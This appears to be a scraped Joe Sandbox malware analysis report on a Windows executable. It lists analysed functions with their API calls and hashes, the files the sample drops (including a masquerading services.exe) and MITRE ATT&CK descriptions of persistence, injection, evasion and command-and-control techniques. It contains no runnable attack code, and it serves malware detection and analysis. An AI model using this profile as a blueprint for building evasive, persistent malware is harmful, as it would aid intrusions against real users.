Uniqueness Score: -1.00%

Function 025F22AC Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

APIs

GetEnvironmentStrings.KERNEL32(?,?,?,?,025F1992), ref: 025F22DB
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,025F1992), ref: 025F237A
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,025F1992), ref: 025F238D
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 025F23CB

Memory Dump Source

Source File: 00000008.00000002.620262476.00000000025F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 025F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25f1000_services.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 4bd92edac54cbe16c8d7d8ea6885e2483de04a3e1ffc62881998fe9d01b1cfa7
Instruction ID: ff44241ec7bb2b8e1c161d8648daabae7460e133d363a1c75d42147c9a4a2e13
Opcode Fuzzy Hash: 4bd92edac54cbe16c8d7d8ea6885e2483de04a3e1ffc62881998fe9d01b1cfa7
Instruction Fuzzy Hash: 943126F2914255AFDBA03EB49C8493B7E9DF649218F450929FF51C3180F7218C8486AD

Uniqueness

Uniqueness Score: -1.00%

Function 025F341E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 025F3432

Strings

, xrefs: 025F347B
, xrefs: 025F3457

Memory Dump Source

Source File: 00000008.00000002.620262476.00000000025F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 025F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25f1000_services.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 1e8541b19d05f456e25009bb63acd025b441da7f6d5a4ca8a0bbd63dd55d1363
Instruction ID: 4af7d5224563467b78301fb479d6fe2682d90f8a8a46331270614b4609583c88
Opcode Fuzzy Hash: 1e8541b19d05f456e25009bb63acd025b441da7f6d5a4ca8a0bbd63dd55d1363
Instruction Fuzzy Hash: 9A4179714052E87AF7968A14DC4DBEA7FDDFB45714F1408E8D789CB142D3224A48CBBA

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 7b8wRbnmKu.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\Desktop\7B8WRB~1.EXE.bat

C:\Users\user\Desktop\7b8wRbnmKu.jpg

C:\Windows\SysWOW64\fservice.exe

C:\Windows\SysWOW64\lncom.exe

C:\Windows\SysWOW64\lncom_.jpg

C:\Windows\SysWOW64\reginv.dll

C:\Windows\SysWOW64\winkey.dll

C:\Windows\System\sservice.exe

C:\Windows\services.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
7b8wRbnmKu.exe

Function 004011B0 Relevance: 59.9, APIs: 31, Strings: 3, Instructions: 443
fileCOMMONCrypto

Function 004016A0 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 107
processfileCOMMON

Function 004010C0 Relevance: 9.1, APIs: 6, Instructions: 87
fileCOMMON

Function 00494D78 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 151
registrystringlibraryCOMMON

Function 0046D840 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 387
COMMON

Function 004193F0 Relevance: 212.8, APIs: 18, Strings: 102, Instructions: 2766
sleepCOMMON

Function 0043A0DC Relevance: 61.6, APIs: 1, Strings: 34, Instructions: 322
COMMON

Function 0041C190 Relevance: 39.0, APIs: 5, Strings: 17, Instructions: 483
fileprocesswindowCOMMON

Function 0041C4D3 Relevance: 26.6, APIs: 2, Strings: 13, Instructions: 320
processwindowCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.
Tactics:	Impact
Data Sources:	Packet capture, Packet capture, Web application firewall logs, Web logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre